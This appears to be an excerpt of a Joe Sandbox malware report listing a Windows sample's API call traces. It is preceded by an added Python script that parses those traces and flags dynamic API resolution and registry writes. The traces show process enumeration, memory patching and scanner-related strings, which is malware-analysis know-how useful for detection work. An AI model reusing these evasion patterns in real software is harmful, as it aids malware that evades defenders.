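The "APIs" blocks above are the part of a Joe Sandbox function listing that a triager actually reads: the WinExec functions resolve their launcher by hand through GetModuleHandle and GetProcAddress (so the import table never names it), and the two registry functions open a key, write one value and close it. The script below is an added example, not Joe Sandbox code or anything shipped with the report: it parses trace lines in exactly the format printed here ("• Api.MODULE(args), ref: ADDR", with the indented "Part of subcall function ADDR:" prefix), groups them per function, and flags those two call patterns. The sample text is copied from the WinExec, CreateFileA and RegSetValueExA blocks on this page; the API sets, the finding names and the REG_* lookup are the script's own heuristics and are labelled as such in the comments.

```python
"""Parse Joe Sandbox "APIs" trace blocks and flag two call patterns.

Added example, not Joe Sandbox code. SAMPLE_REPORT below is copied from three
of the report's function blocks; the API sets, finding names and REG_TYPES
table are this script's own heuristics, not report output.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One trace line, e.g. "• WinExec.KERNEL32(?,?), ref: 031D8624" or the indented
# "• Part of subcall function 031D8274: GetProcAddress.KERNEL32(...), ref: 031D82C7"
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Heuristic API groups (assumption: not from the report).
RESOLVERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW", "GetProcAddress"}
EXECUTORS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW"}
REG_OPEN = {"RegOpenKeyA", "RegOpenKeyW", "RegOpenKeyExA", "RegOpenKeyExW",
            "RegCreateKeyA", "RegCreateKeyW", "RegCreateKeyExA", "RegCreateKeyExW"}
REG_SET = {"RegSetValueExA", "RegSetValueExW"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}


@dataclass
class Call:
    api: str
    module: str
    args: list                 # stack words as printed: hex, "?" or a string literal
    ref: int                   # call-site address
    subcall_of: Optional[int]  # helper the call was observed inside, if any


@dataclass
class FunctionTrace:
    calls: list = field(default_factory=list)

    def api_names(self):
        return [c.api for c in self.calls]


def parse_traces(text: str) -> list:
    """Start a new FunctionTrace at each 'APIs' heading; keep only lines that match CALL_RE."""
    traces, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionTrace()
            traces.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue  # "Strings", "Memory Dump Source" and similar headings are skipped
        raw = m.group("args")
        current.calls.append(Call(
            api=m.group("api"), module=m.group("mod"),
            args=raw.split(",") if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return traces


def _hex_arg(call: Call, index: int) -> Optional[int]:
    """Stack argument `index` as an int when the trace printed a hex word, else None."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def flag(trace: FunctionTrace) -> list:
    """Return heuristic finding names for one function's call list."""
    names = set(trace.api_names())
    findings = []
    # Pattern 1: launcher resolved at run time, so it is absent from the import table.
    if names & RESOLVERS and names & EXECUTORS:
        findings.append("dynamic-resolution-then-exec")
    # Pattern 2: key opened/created, then a value written. RegSetValueEx's 4th
    # argument is dwType and its 6th is cbData; both are visible in the trace.
    if names & REG_OPEN:
        for c in trace.calls:
            if c.api in REG_SET:
                reg_type = REG_TYPES.get(_hex_arg(c, 3), "REG_UNKNOWN")
                findings.append(f"registry-write:{reg_type}:{_hex_arg(c, 5)}")
    return findings


def scan(text: str) -> list:
    """(function index, findings) for every function that triggered something."""
    return [(i, f) for i, t in enumerate(parse_traces(text)) if (f := flag(t))]


SAMPLE_REPORT = """\
APIs
  • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
  • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
  • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
  • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
  • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
• WinExec.KERNEL32(?,?), ref: 031D8624
Strings
Memory Dump Source
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5C88
• GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5CB6
  • Part of subcall function 031CA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,031CC3D9,00000000,031CC433), ref: 031CA797
Memory Dump Source
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,0333BA58), ref: 031DF258
• RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF290
• RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF29B
Memory Dump Source
"""

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REPORT):
        print(f"function #{index}: {', '.join(findings)}")
```

Running it on the embedded sample reports the first function as "dynamic-resolution-then-exec" and the third as "registry-write:REG_SZ:28": the trace shows dwType 0x1 (REG_SZ) and cbData 0x1C, i.e. a 27-character ANSI string plus its terminator, while the subkey string at 0333BA58 is not printed, so the script does not guess what key it is. The CreateFileA/GetLastError function produces nothing, which is the point of grouping per "APIs" block rather than matching names across the whole report.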
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 90f588012faa577b6bf270a08ac859a3486f47609fd39f2c6025e50af90de6e6
                                                                                              • Instruction ID: 2194f70144f3c57d4d6690273022e6bfb8a096b758b51043921776f2392e4936
                                                                                              • Opcode Fuzzy Hash: 90f588012faa577b6bf270a08ac859a3486f47609fd39f2c6025e50af90de6e6
                                                                                              • Instruction Fuzzy Hash: B9F0C268738280C7CB24FB39CD8456A27985F7C342714347EA40A9F105CB65ED86C3B3
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 031C4D5B
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 031C4D6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 986138563-0
                                                                                              • Opcode ID: 14a39e70b1f36bc65fa893dbd8748944ab5609f9adeb0f78e0d3211148921afc
                                                                                              • Instruction ID: 5cb82894392228de8eb03fcea344f38ac1998289cbd96fade51cae6335cbee1c
                                                                                              • Opcode Fuzzy Hash: 14a39e70b1f36bc65fa893dbd8748944ab5609f9adeb0f78e0d3211148921afc
                                                                                              • Instruction Fuzzy Hash: EDE0E6FC1253856FEF15DF229D50A76A2299FED640B28446C9401CD164DB38D841552C
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(?), ref: 031D73DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID: H
                                                                                              • API String ID: 3341692771-2852464175
                                                                                              • Opcode ID: 66a4979ca4d9748bb100005ce78da06a5ada8dbfd7777618d4489a826eaa170b
                                                                                              • Instruction ID: 16325dc0a77af5691910808f8308f19b717bf148e05d59137f8f25dcad21ca44
                                                                                              • Opcode Fuzzy Hash: 66a4979ca4d9748bb100005ce78da06a5ada8dbfd7777618d4489a826eaa170b
                                                                                              • Instruction Fuzzy Hash: 09B1E279A01648AFDB15CF99D880A9DFBF6FF8E310F1581A9E845AB360D730A845CF50
                                                                                              APIs
                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 031CE781
                                                                                                • Part of subcall function 031CE364: VariantClear.OLEAUT32(?), ref: 031CE373
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy
APIs
Memory Dump Source
• Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: InitVariant
APIs
  • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
  • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
  • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
  • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
  • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
  • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
  • Part of subcall function 031D8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031D83C2), ref: 031D83A4
• FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,031D6DB9,?,?,?,00000000), ref: 031D6D99
  • Part of subcall function 031C4C60: SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
Similarity
• API ID: FreeFromProgString
APIs
• GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031C5886
  • Part of subcall function 031C5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,031C0000,031EE790), ref: 031C5AE8
  • Part of subcall function 031C5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B06
  • Part of subcall function 031C5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B24
  • Part of subcall function 031C5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031C5B42
  • Part of subcall function 031C5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031C5B8B
  • Part of subcall function 031C5ACC: RegQueryValueExA.ADVAPI32(?,031C5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001), ref: 031C5BA9
  • Part of subcall function 031C5ACC: RegCloseKey.ADVAPI32(?,031C5BD8,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031C5BCB
Similarity
• API ID: Open$FileModuleNameQueryValue$Close
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 031C7DF4
Similarity
• API ID: FileWrite
APIs
• GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
Similarity
• API ID: AttributesFile
APIs
• GetFileAttributesA.KERNEL32(00000000,?,031E356F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,Initialize), ref: 031C7E8B
Similarity
• API ID: AttributesFile
APIs
Similarity
• API ID: FreeString
APIs
• timeSetEvent.WINMM(00002710,00000000,031EC350,00000000,00000001), ref: 031EC36C
Similarity
• API ID: Eventtime
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 031C4C3F
Memory Dump Source
• Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31c0000_x.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
APIs
• SysFreeString.OLEAUT32(00000000), ref: 031C4C57
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,031C1A03,?,031C2000), ref: 031C15E2
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,031C2000), ref: 031C16A4
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 031C1704
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,031DADA3,?,?,031DAE35,00000000,031DAF11), ref: 031DAB30
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 031DAB48
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 031DAB5A
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 031DAB6C
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 031DAB7E
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 031DAB90
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 031DABA2
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 031DABB4
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 031DABC6
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 031DABD8
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 031DABEA
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 031DABFC
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 031DAC0E
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 031DAC20
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 031DAC32
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 031DAC44
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 031DAC56
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 031C593C
• lstrcpynA.KERNEL32(?,?,?), ref: 031C596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C59D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000,031EE790), ref: 031C5A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C,031C0000), ref: 031C5A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,031C737C), ref: 031C5A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 031C5A99
Strings
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031C5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 031C5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 031C5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 031C5C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 031C5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 031C5CEB
Strings
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
                                                                                              APIs
                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 031C7FF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1705453755-0
                                                                                              • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                              • Instruction ID: 8e38d4e0ecc86bacb0c308a77a9461f20c7484a0ce824a4f3f7a7a3738241ad0
                                                                                              • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                              • Instruction Fuzzy Hash: 151100B5A00209AF9B00CF99C881DAFF7F9FFCD300B14C559A414EB250E671AA01CB90
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                              • Instruction ID: da33b0a759cf9b83adfa4d550ec06157ed20eabb5003832d5537cd57e20033a7
                                                                                              • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                              • Instruction Fuzzy Hash: 18E0D87572435817D316E55D9C80EFA725CAB6C610F00427EBD05CB385EFF19E8046E8
                                                                                              APIs
                                                                                              • GetVersionExA.KERNEL32(?,031ED106,00000000,031ED11E), ref: 031CB79A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID:
                                                                                              • API String ID: 1889659487-0
                                                                                              • Opcode ID: 1edb9d1cd1876dce230502a44d67f8269d1321a30f3d86a91dad482e1a9c7364
                                                                                              • Instruction ID: 9cf2ca581c85b1ee0e0cc90ed55b3d2bc1f3326c8dbb79584cc81e24cfa0fe43
                                                                                              • Opcode Fuzzy Hash: 1edb9d1cd1876dce230502a44d67f8269d1321a30f3d86a91dad482e1a9c7364
                                                                                              • Instruction Fuzzy Hash: B6F017789183418FD348EF68D44161577E8FB5C600F04892CE898CB388E7369494DBB2
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,031CBE72,00000000,031CC08B,?,?,00000000,00000000), ref: 031CA823
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                              • Instruction ID: d68044233d66bdc905ea93cfadf816996a074cd0f2ccce30db3a596bd3d7de86
                                                                                              • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                              • Instruction Fuzzy Hash: 0DD05EA631E2A42BA215D15A2D84D7B5ADCDED9AA2F04403EB988CA111D310CC07D671
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
